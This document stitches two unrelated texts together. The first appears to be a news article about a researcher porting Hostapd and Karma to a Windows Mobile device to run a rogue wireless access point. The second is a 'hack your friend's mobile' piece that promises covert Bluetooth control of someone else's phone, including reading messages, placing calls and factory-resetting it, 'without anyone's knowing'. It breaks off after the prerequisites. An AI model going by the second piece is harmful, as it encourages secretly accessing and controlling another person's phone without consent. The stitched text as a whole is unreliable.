Banzhof faced a number of technical challenges--in part because most of the tools were written for Linux, not Windows Mobile. He looked around for other work done on WinCE and Windows Mobile 5 and found none. He considered converting the device to Linux but decided that violated the spirit of the project. He found some Linux projects that could be ported over, namely Hostapd and Karma. He started to use Visual Studio 2005 to compile the new code by hand, and instead found an open-source tool, CeGCC, to cross compile.
Devil in the details
By using Hostapd, Banzhof had many user-space 802.11 functions at his disposal, such as user authentication, encryption, initializing a network interface, beacon intervals to call out to susceptible laptops, and Extensible Authentication Protocol (EAP) keys. It also gave him an interface into the ACX100 driver (which handles the 802.11 protocol) so he could handle the management, transmission, and reception of wireless data packets. But again, there were problems. The open-source app, CeGCC, doesn't always work right, so he had to improvise, and wireless card selection for Hostapd was limited and didn't exist for the mobile device form factor.
The IIS for Windows Mobile server posed similar challenges. IIS for Windows Mobile supports Active Server Pages and ISAPI, with configurable options found in the system registry for allowing ports, creating virtual directories, and controlling bandwidth.
Testing it out
Banzhof reported to the RSA conference that he'd successfully ported Hostapd to Windows CE, he had his DHCP/DNS server operational, and his Web server was online. He hopes in the future to route his sniffed Internet traffic to legitimate access points or via smart phone radio (EDGE) for further analysis.
Banzhof also hinted that similar hacks could be carried out with the new iPhone from Apple, given that many of the tools he used already run on Unix and Linux. Never mind that Apple promises that the iPhone will be a closed system. Banzhof noted that hasn't stopped anyone before.
log into your friend's mobile
read his messages
change his phone settings
change profile
play his ringtone even if phone is on silent
play his songs(in his phone)
restart the phone
switch off the phone
restore factory settings
change ringing volume
call from his phone
OK, so how the hell do you do this? For starters, this is no hack. It uses Bluetooth's existing functionality to access the features being talked about.
Prerequisites:
The other phone must be Bluetooth enabled (most are these days).
The other phone must have Bluetooth on. (Surprisingly, a lot of people always have it on, in spite of the fact that you should never have it on: it eats your battery. How many people? A BBC Panorama programme some time back found that more than 60% of people had left Bluetooth on.)
Unless the other person configured it that way, you do require permission to pair once. So you need to be paired with the other phone once to use this hack next time without anyone's knowing. (That's why it's "hack your friend's mobile": your friend might have paired with you already.)